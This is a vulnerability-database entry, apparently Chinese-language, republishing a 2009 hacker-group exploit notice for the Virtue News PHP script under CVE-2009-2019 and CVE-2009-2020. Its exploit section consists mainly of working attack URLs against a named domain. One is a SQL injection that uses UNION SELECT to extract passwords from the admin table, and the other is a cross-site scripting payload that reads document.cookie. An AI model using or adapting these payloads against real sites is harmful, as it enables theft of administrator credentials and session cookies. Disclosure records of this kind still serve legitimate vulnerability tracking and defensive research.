Virtue News (SQL/XSS) Multiple Remote Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051888 漏洞类型
发布时间 2009-06-12 更新时间 2009-06-12
CVE编号 CVE-2009-2019
CVE-2009-2020
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009060133
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#-------------------------AllaH AkbaR-------------------------------
#Virtue News Multiple Remote Vulnerabilities
#-------------------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com
#Site:http://www.snakespc.com/sc/index.php
#
#            les Algériens Kamikaz Wa4rin Fi kol Bla4s 
#-------------------------SNAKES TEAM-------------------------------
#Script:Virtue News
#
#
#http://www.virtuenetz.com/news_manager.php
#--------------------------SNAKES TEAM------------------------------
#Exploit:
#--------
#Demo:sql
#http://www.virtuenetz.com/news/news_detail.php?nid=-2+UNION%20SELECT%201,2,3,password,5,6,7+from+admin--
#Xss
#http://www.virtuenetz.com/news/news_detail.php?nid="><script>alert(document.cookie)</script>